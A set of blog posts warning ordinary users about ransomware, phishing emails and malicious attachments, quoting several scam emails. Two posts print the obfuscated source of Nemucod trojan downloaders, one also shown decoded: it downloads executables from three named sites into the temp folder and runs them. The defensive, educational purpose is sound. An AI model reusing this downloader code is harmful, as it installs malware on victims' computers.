Here’s why you do external backups

ransomware

The BotNet distributing the original Cryptolocker was taken down (I’ve mentioned this malware multiple times), and many people were able to get their data back – but there are still many malicious clones of this supremely evil malware floating around out there.

Per this article (in Norwegian, but you can use Google Translate to get a good gist of its meaning in English), if your files have been encrypted, you’re pretty well screwed. Your only options are to pay the ransom (which does not guarantee that you will get a decryption key) or bring your files back from a non-connected, external backup – this because the encrypting malware can affect cloud storage as well either directly or indirectly.

To protect yourself from this sort of data horror:

  1. Back up your files to an unconnected external drive regularly
  2. Never open email attachments from unknown people, no matter how legitimate they may look

Hell is going to be a busy place. Be careful out there.

The Old Wolf has spoken.

An Illustration: Why you never open those attachments.

noattachments

I got two emails yesterday, each with an attachment. Both are designed to get people to open whatever malware package they are carrying:

To: [redacted]
Subject: Notice to appear in Court #00000554562

From: “District Court” <nathaniel.berger@realestate-philippines.net>

Notice to Appear,

This is to inform you to appear in the Court on the July 06 for your case hearing.
Please, do not forget to bring all the documents related to the case.
Note: The case will be heard by the judge in your absence if you do not come.
The copy of Court Notice is attached to this email.
Kind regards,
Nathaniel Berger,
Clerk of Court.
Attached: 00000554562.zip

Subject: Indebtedness for driving on toll road #0000133433
To: [redacted]

From: “E-ZPass Manager” <calvin.gleason@adescbrasil.com.br>

Notice to Appear,
You have a unpaid bill for using toll road.
Please, do not forget to service your debt.
You can review the invoice in the attachment.
Sincerely,
Calvin Gleason,
E-ZPass Agent.
E-ZPass_0000133433.zip

Notice that the second email begins the same way: “Notice to appear,” even though it’s a notification of a supposed debt. These were clearly cut/pasted by the same person/group.

So let’s look at that attachment.

The E-Z Pass zip file contains a file called “E-ZPass_0000133433.doc.js.” This is a javascript file, and it was immediately quarantined by Microsoft Security Essentials and flagged as TrojanDownloader:JS/Nemucod.P. According to Microsoft, “This program displays deceptive program messages. It downloads and installs other programs onto your PC without your consent, including other malware.”

Clearly, you don’t want to mess with this on your machine. The body of the file looks like this:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;function igs118() { return ‘4 && ‘; };  function igs236() { return ‘);’; };  function igs101() { return ‘); x’; };  function igs193() { return ‘ x’; };  function igs232() { return ‘3862’; };  function igs3() { return ‘ dl’; };  function igs30() { return ‘i=’; };  function igs140() { return ‘a.ty’; };  function igs182() { return ‘} ‘; };  function igs74() { return ‘.rou’; };  function igs162() { return ‘1; x’; };  function igs23() { return ‘com”‘; };  function igs131() { return ‘ect(‘; };  function igs217() { return ‘ } c’; };  function igs228() { return ‘; dl(‘; };  function igs176() { return ‘{ ws’; };  function igs136() { return ‘”); x’; };  function igs141() { return ‘pe ‘; };  function igs97() { return ‘SXML2’; };  function igs192() { return ‘try {‘; };  function igs63() { return ‘(“‘; };  function igs50() { return ‘”);’; };  function igs229() { return ‘6001)’; };  function igs89() { return ‘ar x’; };  function igs66() { return ‘”)+’; };  function igs46() { return ‘WS’; };  function igs19() { return ‘ a’; };  function igs79() { return ‘m()*’; };  function igs186() { return ‘; };’; };  function igs28() { return ‘ (v’; };  function igs29() { return ‘ar ‘; };  function igs117() { return ‘e == ‘; };  function igs216() { return ‘nd();’; };  function igs185() { return ‘r) {}’; };  function igs113() { return ‘ (x’; };  function igs90() { return ‘o ‘; };  function igs72() { return ‘)+’; };  function igs70() { return ‘arCod’; };  function igs49() { return ‘ell’; };  function igs233() { return ‘); d’; };  function igs171() { return ‘ile(‘; };  function igs201() { return ‘]+”/d’; };  function igs166() { return ‘ 0; x’; };  var ci = ”;  function igs127() { return ‘ new ‘; };  function igs40() { return ‘s =’; };  function igs219() { return ‘h ‘; };  function igs206() { return ‘nd=”+’; };  function igs61() { return ‘rin’; };  function igs22() { return ‘ge.’; };  function igs102() { return ‘o.o’; };  function igs138() { return ‘pen’; };  function igs14() { return ‘cl’; };  function igs111() { return ‘n()’; };  function igs10() { return ‘so’; };  function igs48() { return ‘.Sh’; };  function igs51() { return ‘ v’; };  function igs98() { return ‘.XMLH’; };  function igs167() { return ‘a.’; };  function igs17() { return ‘etqy’; };  function igs42() { return ‘Ac’; };  function igs194() { return ‘o.’; };  function igs129() { return ‘eX’; };  function igs137() { return ‘a.o’; };  function igs91() { return ‘= ‘; };  function igs144() { return ‘a.’; };  function igs159() { return ‘ { d’; };  function igs45() { return ‘t(“‘; };  function igs2() { return ‘ion’; };  function igs92() { return ‘new’; };  function igs18() { return ‘.com’; };  function igs106() { return ‘atec’; };  function igs8() { return ‘”dick’; };  function igs65() { return ‘P%’; };  function igs147() { return ‘e(xo’; };  function igs68() { return ‘g.f’; };  function igs75() { return ‘nd’; };  function igs24() { return ‘.spli’; };  function igs200() { return ‘”+b[i’; };  function igs47() { return ‘cript’; };  function igs227() { return ‘ } }’; };  function igs179() { return ‘n,’; };  function igs161() { return ‘= ‘; };  function igs187() { return ‘ xa’; };  function igs67() { return ‘Strin’; };  function igs34() { return ‘leng’; };  function igs27() { return ‘for’; };  function igs143() { return ‘; x’; };  function igs199() { return ‘tp://’; };  function igs35() { return ‘th; ‘; };  function igs177() { return ‘.R’; };  function igs39() { return ‘ w’; };  function igs4() { return ‘(fr’; };  function igs153() { return ‘f (‘; };  function igs189() { return ‘ose(‘; };  function igs115() { return ‘ead’; };  function igs33() { return ‘b.’; };  function igs1() { return ‘funct’; };  function igs146() { return ‘it’; };  function igs44() { return ‘Objec’; };  function igs145() { return ‘wr’; };  function igs38() { return ‘ var’; };  function igs11() { return ‘nw’; };  function igs108() { return ‘e ‘; };  function igs94() { return ‘ve’; };  function igs205() { return ‘p?r’; };  function igs169() { return ‘veT’; };  function igs174() { return ‘); tr’; };  function igs16() { return ‘om ‘; };  function igs105() { return ‘dyst’; };  function igs170() { return ‘oF’; };  function igs83() { return ‘)+”.e’; };  function igs230() { return ‘; d’; };  function igs78() { return ‘rando’; };  function igs149() { return ‘spo’; };  function igs21() { return ‘na’; };  function igs37() { return ‘+) {‘; };  function igs203() { return ‘ume’; };  function igs125() { return ‘ xa’; };  function igs76() { return ‘(Ma’; };  function igs41() { return ‘ new ‘; };  function igs188() { return ‘.cl’; };  function igs134() { return ‘.St’; };  function igs80() { return ‘10000’; };  function igs116() { return ‘yStat’; };  function igs150() { return ‘ns’; };  function igs135() { return ‘ream’; };  function igs114() { return ‘o.r’; };  function igs96() { return ‘ct(“M’; };  function zuw() { return ‘e’; };  function igs215() { return ‘.se’; };  function igs139() { return ‘(); x’; };  function igs62() { return ‘gs’; };  function igs130() { return ‘Obj’; };  function igs222() { return ‘; if ‘; };  function igs218() { return ‘atc’; };  function igs133() { return ‘ODB’; };  function igs207() { return ‘fr+”&’; };  function igs123() { return ‘200) ‘; };  function igs202() { return ‘oc’; };  function igs6() { return ‘var ‘; };  function igs152() { return ‘); i’; };  function igs198() { return ‘”,”ht’; };  function igs148() { return ‘.Re’; };  function igs221() { return ‘) {}’; };  function igs25() { return ‘t(” “‘; };  function igs234() { return ‘l(‘; };  function igs100() { return ‘P”‘; };  function igs209() { return ‘=”+s’; };  function igs165() { return ‘ion =’; };  function igs204() { return ‘nt.ph’; };  function igs104() { return ‘ea’; };  function igs55() { return ‘.Expa’; };  function igs112() { return ‘ { if’; };  function igs99() { return ‘TT’; };  function igs5() { return ‘) { ‘; };  function igs12() { return ‘res’; };  function igs178() { return ‘un(f’; };  function igs87() { return ‘ = ‘; };  function igs195() { return ‘op’; };  function igs85() { return ‘; v’; };  function igs214() { return ‘ xo’; };  function igs224() { return ‘ == 1’; };  function igs226() { return ‘reak;’; };  function igs223() { return ‘(dn’; };  function igs124() { return ‘{ var’; };  function igs196() { return ‘en(“G’; };  function igs95() { return ‘XObje’; };  function igs31() { return ‘0; ‘; };  function igs15() { return ‘ub.c’; };  function igs126() { return ‘ =’; };  function igs54() { return ‘ ws’; };  function igs73() { return ‘Math’; };  function igs82() { return ’00’; };  function igs231() { return ‘l(‘; };  function igs119() { return ‘xo.s’; };  function igs107() { return ‘hang’; };  function igs86() { return ‘ar dn’; };  function igs190() { return ‘); }’; };  function igs155() { return ‘.si’; };  function igs213() { return ‘e);’; };  function igs58() { return ‘onm’; };  function igs7() { return ‘b = ‘; };  function igs208() { return ‘id’; };  function igs120() { return ‘ta’; };  function igs121() { return ‘tu’; };  function igs88() { return ‘0; v’; };  function igs71() { return ‘e(92’; };  function igs84() { return ‘xe”‘; };  function igs36() { return ‘i+’; };  function igs122() { return ‘s == ‘; };  function igs109() { return ‘= fu’; };  function igs69() { return ‘romCh’; };  function igs56() { return ‘ndEnv’; };  function igs64() { return ‘%TEM’; };  function igs212() { return ‘als’; };  function igs110() { return ‘nctio’; };  function igs103() { return ‘nr’; };  function igs164() { return ‘posit’; };  function igs173() { return ‘,2’; };  function igs225() { return ‘) b’; };  function igs53() { return ‘fn =’; };  function igs157() { return ‘> 500’; };  function igs151() { return ‘eBody’; };  function igs175() { return ‘y ‘; };  function igs9() { return ‘in’; };  function igs13() { return ‘tling’; };  function igs154() { return ‘xa’; };  function igs32() { return ‘i<‘; };  function igs59() { return ‘ent’; };  function igs172() { return ‘fn’; };  function igs() { return ‘val’; };  function igs142() { return ‘= 1′; };  function igs81() { return ’00’; };  function igs180() { return ‘1,’; };  function igs57() { return ‘ir’; };  function igs43() { return ‘tiveX’; };  function igs60() { return ‘St’; };  function igs160() { return ‘n ‘; };  function igs191() { return ‘; }; ‘; };  function igs183() { return ‘catch’; };  function igs77() { return ‘th.’; };  function igs52() { return ‘ar ‘; };  function igs235() { return ‘8083’; };  function igs163() { return ‘a.’; };  function igs181() { return ‘0); ‘; };  function igs132() { return ‘”AD’; };  function igs156() { return ‘ze ‘; };  function igs197() { return ‘ET’; };  function igs128() { return ‘Activ’; };  function igs20() { return ‘volo’; };  function igs211() { return ‘, f’; };  function igs93() { return ‘ Acti’; };  function igs168() { return ‘sa’; };  function igs158() { return ‘0)’; };  function igs26() { return ‘); ‘; };  function igs210() { return ‘troke’; };  function igs184() { return ‘ (e’; };  function igs220() { return ‘(er’; }; for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

The last statement in the program concatenates all these little scraps of code (listed out of order) into one large statement and then executes it:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;
{ return valfunction dl(fr) { var b = “dickinsonwrestlingclub.com etqy.com avolonage.com”.split(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; x; }; var ci = ;
a.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; } }; dl(6001); dl(3862); dl(8083);zuwe
for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

Now I’m not a Javascript coder, but I can tell just by looking at it that this will access several compromised or outright malicious websites out there, and then download and run other files which are guaranteed to make your life miserable. At the least, you’ll get advertisements and popups. At worst, you will lose all your data in horrible ways or become part of a spamming network of zombie computers, or have your identity and your financial information stolen and used by criminals. None of these things are appealing.

To protect yourself, these two rules should be followed at all times:

  1. Do not click on links. Instead, copy the URL from the email and paste it into your browser. Even better is to simply type the destination name into your browser.
  2. Be suspicious of attachments, and only open those that you are expecting.

There are others, but if everyone would follow these two basic common-sense procedures, the bad actors would have far less access to people’s machines and data.

Protect your loved ones, and be careful out there.

The Old Wolf has spoken.

Protect yourself from Phishing attacks

nophishing

Great advice from a local business:

  • Be suspicious of any email that requires “immediate action” or creates a sense of urgency. This is a common technique used by criminals to rush people into making a mistake.
  • Be suspicious of emails addressed to “Dear Customer” or some other generic salutation. If it is your bank, they will know your name.
  • Be suspicious of grammar or spelling mistakes; most businesses proofread their messages carefully before sending them.
  • Do not click on links. Instead, copy the URL from the email and paste it into your browser. Even better is to simply type the destination name into your browser.
  • Hover your mouse over the link. This will show you the true destination where you would go if you actually clicked on it. If the true destination of the link is different than what is shown in the email, this may be an indication of fraud.
  • Be suspicious of attachments, and only open those that you are expecting.
  • Just because you got an email from your friend does not mean they sent it. Your friend’s computer may have been infected or their account may have been compromised, and malware is sending the email to all of your friend’s contacts.
  • If you get a suspicious email from a trusted friend or colleague, call them to confirm that they sent it. Always use a telephone number that you already know or can independently verify, not one that was included in the message.

I’ve mentioned most of these in various other posts, but this was an excellent summary that deserved to be shared. Be careful out there.

The Old Wolf has spoken.

An .EXE file is not an invoice

Chapa NO MALWARE

Today’s scam email:

From: “Agnessa Arina” <agnessaarina@yahoo.es>
To: redacted
Subject: FW::deposit invoice copy

Hi,

we are updating our company email address so i’m sending you the outstanding balance and new lodging.

Confirm receipt.

Amy chan

Tridium, Inc.
3951 Westerre Parkway, Suite 350
Richmond, VA 23233
USA.

View Download

That “Download” is a file called “deposit copy.exe” – something you NEVER want to click on. EXE files are PROGRAMS, and they are BAD NEWS. From code that will log your keystrokes, steal your information, turn your machine into a zombie spamming device, to encrypting all your files for ransom, these malware programs will make your life a living hell. Just don’t do it.

The Old Wolf has spoken.

Again: Don’t click on email attachments from unknown people.

This cannot be stressed enough: Don’t click on email attachments from unknown people.

Edit: Friends have pointed out that it’s best to be wary of attachments appearing to be from people you know, if you aren’t expecting one. Contact lists can be stolen and people impersonated.

pc-trojan

Yesterday this email showed up in my inbox:

To: [edited]
Subject: We could not deliver your parcel, #00576180
From: “FedEx International Ground” <allan.horton@web2.pnet.xcon.it>

Dear Customer,

This is to confirm that one or more of your parcels has been shipped.
Delivery Label is attached to this email.

Sincerely,
Allan Horton,
Operation Agent.
(C) 2014 FedEx. The content of this message is protected by copyright and trademark laws. All rights reserved.

Attached to the email was a file called “FedEx_ID_00576180.zip.”

Curious as ever, in an isolated environment I unpacked the zip file, and the result was immediately flagged and quarantined by Microsoft Security Essentials as containing the file “FedEx_ID_00576180.doc.js,” which contained “TrojanDownloader:JS/Nemucod.F

What that means is that this is a javascript file containing executable code which would go out to the internet and download horrible things onto your computer – adware, keyloggers, botnet software, or even never-sufficiently-to-be-damned ransomware like Cryptolocker which could encrypt all your files and demand hundreds of dollars for a decryption key.

When I examined the file contents, it looked like this:

function hhhhhhhhhhhhhhh(){ccccc += ‘+”‘; jjjjjjjjjjjjjjj(); };  function iiiiiiiiiiiiiiii(){ccccc += ‘ction’; tttttttttttttt(); };  function ggggggggggggggg(){ccccc += ‘e();’; xxxxxxxxx(); };  function fffffff(){ccccc += ‘= w’; llllll(); };  function yyyyyyyyyyyyyyyy(){ccccc += ‘new ‘; wwwwwwwwwwwwwwww(); };  function gggggggggggggggg(){ccccc += ‘(“WS’; qqqqqqqqqqqqq(); };  function zzzzzzzzzzzz(){ccccc += ‘t.php’; llllllllllllll(); };…

In other words, it looked like garbage. Refuse. Filth. Muck. Boo! Boo! Booooooo! But when I massaged the file a little, putting each “function” call on a new line, this is what came out:

function hhhhhhhhhhhhhhh(){ccccc += ‘+”‘; jjjjjjjjjjjjjjj(); };
function iiiiiiiiiiiiiiii(){ccccc += ‘ction’; tttttttttttttt(); };
function ggggggggggggggg(){ccccc += ‘e();’; xxxxxxxxx(); };
function fffffff(){ccccc += ‘= w’; llllll(); };
function yyyyyyyyyyyyyyyy(){ccccc += ‘new ‘; wwwwwwwwwwwwwwww(); };
function gggggggggggggggg(){ccccc += ‘(“WS’; qqqqqqqqqqqqq(); };
function zzzzzzzzzzzz(){ccccc += ‘t.php’; llllllllllllll(); };
function jjjjjjjj(){ccccc += ‘dys’; zzzzzzzz(); };
function pppppppppp(){ccccc += ‘dl(51’; llllllll(); };
function xxxxxxxxxxxx(){ccccc += ‘ xa’; hhhhhhhhhhhhhh(); };
function ssssssssssss(){xx += ‘a’; ccccc += ‘n ‘; gggggggggg(); };
function wwwwwwwwwww(){ccccc += ‘de(92’; ssssssssssssssss(); };
function bbbbbbbbb(){ccccc += ‘bluee’; jjjjjjjjj(); };
function qqqqqqqqqqqqqq(){ccccc += ’00’; iiiiiiiiii(); };
function eeeeeeeee(){ccccc += ‘iv’; wwwwwwww(); };
function eeeeeeeeee(){ccccc += ‘ySt’; ggggggg(); };
function vvvvvvvvvvvvvv(){ccccc += ‘o.sta’; wwwwwww(); };
function pppppppppppppppp(){ccccc += ‘; ‘; aaaaaaaaaaaaa(); };
function ddddddddddddddd(){ccccc += ‘) ‘; ppppppp(); };
function dddddddddd(){ccccc += ‘ct’; ssssssssssssss(); };
function pppppp(){ccccc += ‘arCo’; wwwwwwwwwww(); };
function xxxxxxxxxxxxxx(){ccccc += ‘ze’; aaaaaaaaaa(); };
function iiiiiii(){ccccc += ‘ength’; gggggggggggg(); };
function yyyyyy(){ccccc += ‘r xo ‘; cccccccc(); };
function pppppppppppppp(){ccccc += ‘a.p’; mmmmmmm(); };
function uuuuuuuuuuu(){ccccc += ‘ariau’; iiiiiiiiiiiiiiii(); };
function ggggggggggg(){ccccc += ‘y)’; pppppppppppppppp(); };
function pppppppppppp(){ccccc += ‘E0707’; qqqqqqqqqqqqqq(); };
function nnnnnn(){ccccc += ‘.nidh’; nnnnnnnnnnnnnnnn(); };
function jjjjjjjjjjj(){ccccc += ‘0B’; eeeeeeeeeeeeeeee(); };
function fffffffffffffff(){ccccc += ‘ound’; hhhhhhhhhh(); };
function mmmmmmmmmmmmmm(){ccccc += ‘ry’; mmmmmmmm(); };
function lllllllllll(){ccccc += ‘ A’; dddddddddd(); };
function xxxxxxxxxx(){ccccc += ‘ }; ‘; ggggggggg(); };
function llllllllllllll(){ccccc += ‘?r’; ddddddddddd(); };
function ccccccccc(){ccccc += ‘A01’; oooooo(); };
function zzzzzzzzzzzzzzzz(){ccccc += ‘xe”; ‘; rrrrrrrrrrrr(); };
function ttttttttttttttt(){ccccc += ‘SXML2’; jjjjjjjjjjjj(); };
function xxxxxxxxxxxxx(){ccccc += ‘} cat’; ccccccccccccc(); };
function jjjjjjjjj(){ccccc += ‘cho’; hhhhhhh(); };
function qqqqqqqq(){ccccc += ‘ct’; nnnnnnnnnnnnnn(); };
function zzzzzzzzzzz(){ccccc += ‘050A2’; rrrrrrrr(); };
function vvvvvvvvvvvvv(){ccccc += ‘dn ‘; lllllllll(); };
function nnnnnnnn(){ccccc += ‘ } ‘; hhhhhhhhhhhhhhhh(); };
function aaaaaaaaaaaa(){ccccc += ‘xo.op’; kkkkkkkkkkk(); };
function sssssssssssss(){ccccc += ‘ (xa’; xxxxxxxx(); };
function hhhhhhhhhhh(){ccccc += ‘ xa.’; qqqqqqqqqqqqqqqq(); };
function wwwwwwww(){ccccc += ‘eX’; ddddddddddddd(); };
function kkkkkkk(){xx += ‘v’; ccccc += ‘tio’; ssssssssssss(); };
function uuuuuuuuuuuuuuuu(){ccccc += ‘eXObj’; bbbbbbbbbb(); };
function ggggggg(){ccccc += ‘ate’; zzzzzzzzzzzzz(); };
function ffffffffffffff(){ccccc += ‘”&id’; ddddddd(); };
function rrrrrrrr(){ccccc += ‘407’; jjjjjjjjjjj(); };
function vvvvvvvv(){ccccc += ‘.read’; eeeeeeeeee(); };
function zzzzzzzzz(){ccccc += ‘515’; pppppppppppp(); };
function sssssssssss(){ccccc += ‘ndom(‘; iiiiiiiiiiii(); };
function cccccccccccc(){ccccc += ‘ent’; bbbbbbbbbbbbbbbb(); };
function rrrrrrrrrr(){ccccc += ‘en()’; sssssss(); };
function iiiiiiiiiiii(){ccccc += ‘)*100’; dddddddddddd(); };
function kkkkkkkkkk(){ccccc += ‘ A’; qqqqqqqq(); };
function qqqqqqqqqqqq(){ccccc += ‘%TEMP’; aaaaaaaa(); };
function mmmmmmmmmmmmm(){ccccc += ‘ct(“M’; ttttttttttttttt(); };
function ccccccc(){ccccc += ‘”h’; rrrrrrrrrrrrrr(); };
function sssssssss(){ccccc += ‘= 1)’; xxxxxxxxxxxxxxx(); };
function cccccccccc(){ccccc += ‘e(xo’; bbbbbbbb(); };
function rrrrrrrrrrrrrrr(){ccccc += ‘ =’; ffffffffffff(); };
function rrrrrrrrrrrr(){ccccc += ‘var’; lllllllllllll(); };
function xxxxxxxx(){ccccc += ‘.si’; xxxxxxxxxxxxxx(); };
function ggggggggggggg(){ccccc += ‘104A0’; ccccccccc(); };
function mmmmmmmmmm(){ccccc += ‘= 1; ‘; kkkkkkkkkkkkk(); };
function bbbbbbbbbbbbbbb(){ccccc += ‘ b’; rrrrrrrrrrrrrrr(); };
function wwwwwww(){ccccc += ‘tu’; tttttttttttt(); };
function sssssss(){ccccc += ‘; xa.’; uuuuuu(); };
function lllllllll(){ccccc += ‘= 1;’; qqqqqqqqqq(); };
function llllll(){ccccc += ‘s.’; ttttttttttt(); };
function rrrrrrrrrrrrrrrr(){ccccc += ‘ar ‘; ssssss(); };
function uuuuuuuuuuuuuuu(){ccccc += ‘ngs’; nnnnnnn(); };
function gggggggggggg(){ccccc += ‘; ‘; lllllll(); };
function fffffffff(){ccccc += ‘r+’; ffffffffffffff(); };
function jjjjjjjjjjjjjjj(){ccccc += ‘.e’; zzzzzzzzzzzzzzzz(); };
function dddddd(){ccccc += ‘ech’; qqqqqq(); };
function eeeeeeee(){ccccc += ‘&& x’; vvvvvvvvvvvvvv(); };
function uuuuuuuu(){xx += ‘e’; ccccc += ‘func’; kkkkkkk(); };
function aaaaaaaaaaaaaa(){ccccc += ‘[i]’; uuuuuuuuuuuuuu(); };
function qqqqqqqqqqqqqqq(){ccccc += ‘o.sen’; wwwwwwwwwwwwww(); };
function ssssssssss(){ccccc += ‘; for’; llllllllllllllll(); };
function lllllllllllll(){ccccc += ‘ dn ‘; dddddddddddddd(); };
function aaaaaaaaaaaaaaa(){ccccc += ‘.Ru’; ccccccccccccccc(); };
function ppppppp(){ccccc += ‘{ va’; qqqqqqqqq(); };
function rrrrrrrrr(){ccccc += ‘r ws ‘; llllllllllll(); };
function bbbbbbbb(){ccccc += ‘.Resp’; mmmmmmmmm(); };
function jjjjjjjjjjjjjj(){ccccc += ‘pt.S’; aaaaaaaaaaaaaaaa(); };
function cccccccccccccc(){ccccc += ‘000’; uuuuuuuuuuuuu(); };
function cccccccccccccccc(){ccccc += ‘it’; bbbbbbbbbbbbb(); };
function xxxxxx(){ccccc += ‘);’; bbbbbbbbbbbb(); };
function ssssss(){ccccc += ‘i=0;’; yyyyyyyyyyyyy(); };
function yyyyyyyyyyyyyyy() { this[xx](ccccc); };
function llllllllllllllll(){ccccc += ‘ (v’; rrrrrrrrrrrrrrrr(); };
function iiiiii(){ccccc += ‘)+S’; hhhhhh(); };
function eeeeeeeeeeee(){ccccc += ‘od’; ggggggggggg(); };
function ccccccccccc(){ccccc += ‘h.r’; fffffffffffffff(); };
function zzzzzz(){ccccc += ‘}; ‘; llllllllll(); };
function aaaaaaaaaaaaaaaa(){ccccc += ‘hell’; pppppppp(); };
function gggggggg(){ccccc += ‘0;’; bbbbbbbbbbbbbb(); };
function hhhhhhhh(){ccccc += ‘B.S’; bbbbbbb(); };
function pppppppp(){ccccc += ‘”); v’; kkkkkkkkkkkkkk(); };
function wwwwwwwwwwwww(){ccccc += ‘nd’; jjjjjjjjjj(); };
function iiiiiiiiii(){ccccc += ’01’; sssssssssssssss(); };
function gggggggggg(){xx += ‘l’; ccccc += ‘dl(fr’; kkkkkkkk(); };
function nnnnnnn(){ccccc += ‘(“‘; qqqqqqqqqqqq(); };
function vvvvvvvvvvvvvvv(){ccccc += ‘oF’; yyyyyyyyy(); };
function iiiiiiii(){ccccc += ‘.f’; ttttttttttttt(); };
function jjjjjj(){ccccc += ‘} }; ‘; pppppppppp(); };
function wwwwwwwwww(){ccccc += ‘om”‘; jjjjjjjjjjjjjjjj(); };
function mmmmmmmm(){ccccc += ‘ { ws’; aaaaaaaaaaaaaaa(); };
function oooooooooooooo(){ccccc += ‘m”);’; hhhhhhhhhhh(); };
function ggggggggg(){ccccc += ‘try’; iiiiiiiiiii(); };
function vvvvvvvvv(){ccccc += ‘en’; zzzzzzzzzzzz(); };
function hhhhhh(){ccccc += ‘tring’; iiiiiiii(); };
function mmmmmmm(){ccccc += ‘ositi’; ttttttttt(); };
function eeeeeeeeeeeeeee(){ccccc += ‘ct’; gggggggggggggggg(); };
function qqqqqqqqqqqqqqqq(){ccccc += ‘op’; rrrrrrrrrr(); };
function ttttttttttttt(){ccccc += ‘ro’; ppppppppppp(); };
function nnnnnnnnn(){ccccc += ‘/”+b’; aaaaaaaaaaaaaa(); };
function hhhhhhh(){ccccc += ‘stud’; yyyyyyyyyyyyyy(); };
function eeeeeeeeeeeeee(){ccccc += ‘; ‘; jjjjjj(); };
function tttttttt(){ccccc += ‘reak’; eeeeeeeeeeeeee(); };
function jjjjjjjjjjjjj(){ccccc += ‘ (dn’; aaaaaaa(); };
function eeeeee(){ccccc += ‘a = n’; iiiiiiiiiiiiiii(); };
function vvvvvvvvvvvv(){ccccc += ‘};’; xxxxxxxxxxxx(); };
function zzzzzzz(){ccccc += ‘”AD’; ddddddddd(); };
function zzzzzzzzzz(){ccccc += ‘n ‘; fffffff(); };
function aaaaaaaa(){ccccc += ‘%”‘; iiiiii(); };
function hhhhhhhhhhhhhh(){ccccc += ‘.clos’; ggggggggggggggg(); };
function yyyyyyyyyyyyy(){ccccc += ‘ i’; fffffffffffff(); };
function eeeeeeeeeeeee(){ccccc += ‘f (xo’; vvvvvvvv(); };
function uuuuuuuuu(){ccccc += ‘ { i’; eeeeeeeeeeeee(); };
function qqqqqqqqqq(){ccccc += ‘ x’; pppppppppppppp(); };
function oooooooooo(){ccccc += ‘je’; mmmmmmmmmmmmm(); };
function iiiiiiiiiii(){ccccc += ‘ { ‘; aaaaaaaaaaaa(); };
function nnnnnnnnnn(){ccccc += ‘dl(20′; ffffffffff(); };
function aaaaaaaaa(){ccccc += ’00)’; hhhhhhhhhhhhhhh(); };
function hhhhhhhhhhhhhhhh(){ccccc += ‘catc’; ssssssss(); };
function kkkkkkkkk(){ccccc += ‘fn,1’; kkkkkk(); };
function nnnnnnnnnnnnnnnn(){ccccc += ‘og’; nnnnnnnnnnnnn(); };
function ffffff(){ccccc += ‘TTP”‘; xxxxxx(); };
function ooooooooooo(){ccccc += ‘lit’; hhhhhhhhh(); };
function mmmmmm(){ccccc += ‘= 0; ‘; iiiiiiiiiiiii(); };
function nnnnnnnnnnnnnn(){ccccc += ‘iv’; uuuuuuuuuuuuuuuu(); };
function bbbbbbbbbb(){ccccc += ‘ect(‘; zzzzzzz(); };
function hhhhhhhhhh(){ccccc += ‘(Ma’; xxxxxxxxxxxxxxxx(); };
function ssssssss(){ccccc += ‘h (e’; ppppppppp(); };
function nnnnnnnnnnnnn(){ccccc += ‘.com ‘; bbbbbbbbb(); };
function kkkkkkkkkkkkk(){ccccc += ‘xa.wr’; mmmmmmmmmmmm(); };
function oooooo(){ccccc += ’10″‘; rrrrrrr(); };
function aaaaaaa(){ccccc += ‘ =’; sssssssss(); };
function ssssssssssssssss(){ccccc += ‘)+Mat’; ccccccccccc(); };
function kkkkkkkkkkkkkkk(){ccccc += ‘.c’; wwwwwwwwww(); };
function ddddddddd(){ccccc += ‘OD’; hhhhhhhh(); };
function iiiiiiiii(){ccccc += ‘”+f’; fffffffff(); };
function eeeeeeeeeeeeeeee(){ccccc += ‘09070’; hhhhhhhhhhhh(); };
function xxxxxxxxxxxxxxx(){ccccc += ‘ b’; tttttttt(); };
function yyyyyyyy(){ccccc += ‘n,2)’; ffffffffffffffff(); };
function mmmmmmmmmmmm(){ccccc += ‘it’; cccccccccc(); };
function bbbbbbbbbbbb(){ccccc += ‘ xo.o’; wwwwwwwww(); };
function llllllll(){ccccc += ’41’; vvvvvv(); };
function vvvvvvvvvvv(){ccccc += ‘ri’; uuuuuuuuuuuuuuu(); };
function zzzzzzzzzzzzz(){ccccc += ‘ ==’; aaaaaaaaaaa(); };
function hhhhhhhhhhhh(){ccccc += ‘517’; ggggggggggggg(); };
function tttttt(){ccccc += ‘r)’; ooooooo(); };
function ssssssssssssss(){ccccc += ‘ive’; dddddddddddddddd(); };
function fffffffffffff(){ccccc += ‘<b.l’; iiiiiii(); };
function qqqqqq(){ccccc += ‘ange ‘; nnnnnnnnnnnn(); };
function xxxxxxxxxxxxxxxx(){ccccc += ‘th.ra’; sssssssssss(); };
function qqqqqqqqqqqqq(){ccccc += ‘cri’; jjjjjjjjjjjjjj(); };
function ppppppppppp(){ccccc += ‘mCh’; pppppp(); };
function aaaaaaaaaa(){ccccc += ‘ > 5’; cccccccccccccc(); };
function ddddddd(){ccccc += ‘=545D’; zzzzzzzzz(); };
function jjjjjjjjjj(){ccccc += ‘Env’; yyyyyyyyyyy(); };
function aaaaaaaaaaaaa(){ccccc += ‘if’; sssssssssssss(); };
function iiiiiiiiiiiiiii(){ccccc += ‘ew’; kkkkkkkkkk(); };
function qqqqqqqqqqq(){ccccc += ‘; ‘; xxxxxxxxxxxxx(); };
function hhhhhhhhhhhhh(){ccccc += ‘lse)’; kkkkkkkkkkkk(); };
function nnnnnnnnnnnn(){ccccc += ‘= ‘; ooooooooooooo(); };
function dddddddddddddddd(){ccccc += ‘XObje’; eeeeeeeeeeeeeee(); };
function kkkkkkkk(){ccccc += ‘) { ‘; uuuuuuuuuu(); };
function ooooooooo(){ccccc += ‘200’; ddddddddddddddd(); };
function xxxxxxxxx(){ccccc += ‘ };’; xxxxxxxxxx(); };
